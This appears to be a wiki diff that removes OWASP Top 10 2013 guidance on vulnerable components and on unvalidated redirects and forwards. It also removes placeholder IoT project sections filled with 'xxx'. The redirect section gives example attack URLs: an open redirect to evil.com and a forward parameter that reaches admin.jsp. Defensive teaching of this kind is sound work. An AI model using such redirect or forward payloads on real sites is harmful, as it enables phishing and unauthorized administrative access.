| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=9|year=2013|language=en}}
| |
| − | In theory, it ought to be easy to figure out if you are currently using any vulnerable components or libraries. Unfortunately, vulnerability reports for commercial or open source software do not always specify exactly which versions of a component are vulnerable in a standard, searchable way. Further, not all libraries use an understandable version numbering system. Worst of all, not all vulnerabilities are reported to a central clearinghouse that is easy to search, although sites like [http://cve.mitre.org/ CVE] and [http://nvd.nist.gov/home.cfm NVD] are becoming easier to search.
| |
| − |
| |
| − | Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. If one of your components does have a vulnerability, you should carefully evaluate whether you are actually vulnerable by checking to see if your code uses the part of the component with the vulnerability and whether the flaw could result in an impact you care about.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=9|year=2013|language=en}}
| |
| − | One option is not to use components that you didn’t write. But that’s not very realistic.
| |
| − |
| |
| − | Most component projects do not create vulnerability patches for old versions. Instead, most simply fix the problem in the next version. So upgrading to these new versions is critical. Software projects should have a process in place to:
| |
| − | # Identify all components and the versions you are using, including all dependencies. (e.g., the [http://mojo.codehaus.org/versions-maven-plugin/ versions] plugin).
| |
| − | # Monitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up to date.
| |
| − | # Establish security policies governing component use, such as requiring certain software development practices, passing security tests, and acceptable licenses.
| |
| − | # Where appropriate, consider adding security wrappers around components to disable unused functionality and/ or secure weak or vulnerable aspects of the component.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=9|year=2013|language=en}}
| |
| − | Component vulnerabilities can cause almost any type of risk imaginable, ranging from the trivial to sophisticated malware designed to target a specific organization. Components almost always run with the full privilege of the application, so flaws in any component can be serious, The following two vulnerable components were downloaded 22m times in 2011.
| |
| − | * [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 Apache CXF Authentication Bypass] – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)
| |
| − | * [http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/ Spring Remote Code Execution] – Abuse of the Expression Language implementation in Spring allowed attackers to execute arbitrary code, effectively taking over the server.
| |
| − |
| |
| − | Every application using either of these vulnerable libraries is vulnerable to attack as both of these components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=9|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − |
| |
| − | * [[OWASP Dependency Check|OWASP Dependency Check (for Java libraries)]]
| |
| − | * [https://github.com/OWASP/SafeNuGet OWASP SafeNuGet (for .NET libraries thru NuGet)]
| |
| − | * [[OWASP Good Component Practices Project]]
| |
| − |
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf The Unfortunate Reality of Insecure Libraries]
| |
| − | * [http://en.wikipedia.org/wiki/Open_source_software_security Open Source Software Security]
| |
| − | * [http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf Addressing Security Concerns in Open Source Components]
| |
| − | * [http://cve.mitre.org/ MITRE Common Vulnerabilities and Exposures]
| |
| − | * [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277 Example Mass Assignment Vulnerability that was fixed in ActiveRecord, a Ruby on Rails GEM]
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A10-Unvalidated Redirects and Forwards'''= | | ='''A10-Unvalidated Redirects and Forwards'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=3|detectability=1|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider anyone who can trick your users into submitting a request to your website. Any website or other HTML feed that your users use could do this.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker links to unvalidated redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. Attacker targets unsafe forward to bypass security checks.
| |
| − |
| |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.
| |
| − |
| |
| − | Detecting unchecked redirects is easy. Look for redirects where you can set the full URL. Unchecked forwards are harder, because they target internal pages.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider the business value of retaining your users’ trust.
| |
| − |
| |
| − | What if they get owned by malware?
| |
| − |
| |
| − | What if attackers can access internal only functions
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=10|year=2013|language=en}}
| |
| − | The best way to find out if an application has any unvalidated redirects or forwards is to:
| |
| − | # Review the code for all uses of redirect or forward (called a transfer in .NET). For each use, identify if the target URL is included in any parameter values. If so, if the target URL isn’t validated against a whitelist, you are vulnerable.
| |
| − | # Also, spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.
| |
| − | # If code is unavailable, check all parameters to see if they look like part of a redirect or forward URL destination and test those that do.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=10|year=2013|language=en}}
| |
| − | Safe use of redirects and forwards can be done in a number of ways:
| |
| − | # Simply avoid using redirects and forwards.
| |
| − | # If used, don’t involve user parameters in calculating the destination. This can usually be done.
| |
| − | # If destination parameters can’t be avoided, ensure that the supplied value is valid, and authorized for the user.<br/> It is recommended that any such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL.<br/> Applications can use ESAPI to override the [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html sendRedirect()] method to make sure all redirect destinations are safe.
| |
| − |
| |
| − | Avoiding such flaws is extremely important as they are a favorite target of phishers trying to gain the user’s trust.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=10|year=2013|language=en}}
| |
| − | '''Scenario #1:''' The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.
| |
| − |
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<nowiki>
| |
| − | http://www.example.com/redirect.jsp?url=evil.com
| |
| − | </nowiki> {{Top_10_2010:ExampleEndTemplate}}
| |
| − |
| |
| − | '''Scenario #2:''' The application uses forwards to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forwards the attacker to administrative functionality for which the attacker isn’t authorized.
| |
| − |
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<nowiki>
| |
| − | http://www.example.com/boring.jsp?fwd=admin.jsp
| |
| − | </nowiki> {{Top_10_2010:ExampleEndTemplate}}
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=10|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * OWASP Article on Open Redirects
| |
| − | * ESAPI SecurityWrapperResponse sendRedirect() method
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * CWE Entry 601 on Open Redirects
| |
| − | * WASC Article on URL Redirector Abuse
| |
| − | * Google blog article on the dangers of open redirects
| |
| − | * OWASP Top 10 for .NET article on Unvalidated Redirects and Forwards
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| − |
| |
| − | ='''FAQs'''=
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}}
| |
| − |
| |
| − | ; Q1
| |
| − | : A1
| |
| − |
| |
| − | ; Q2
| |
| − | : A2
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| − |
| |
| − | ='''Acknowledgements'''=
| |
| | | | |
| − | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}}
| |
| | | | |
| − | ==Volunteers==
| |
| − | The OWASP Internet of Things Top Ten Project is developed by a worldwide team of volunteers. The primary contributors to date have been:
| |
| − |
| |
| − | * xxx
| |
| − | * xxx
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=2|risk=1|year=2013|language=en}}
| |
| − |
| |
| − | ==Others==
| |
| − |
| |
| − | * xxx
| |
| − | * xxx
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=Acknowledgements
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| − |
| |
| − | ='''Road Map and Getting Involved'''=
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}}
| |
| − |
| |
| − | As of January 2014, the priorities are:
| |
| − | * xxx
| |
| − | * xxx
| |
| − | * xxx
| |
| − |
| |
| − | Involvement in the development and promotion of the OWASP Internet of Things Top Ten Project is actively encouraged!
| |
| − | You do not have to be a security expert in order to contribute.
| |
| − | Some of the ways you can help:
| |
| − | * xxx
| |
| − | * xxx
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=Road Map and Getting Involved
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| − |
| |
| − |
| |
| − | ='''Project About'''=
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}}
| |
| − | {{:Projects/OWASP_Internet_of_Things_Top_Ten_Project}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=Project About
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | <headertabs /> | | <headertabs /> |
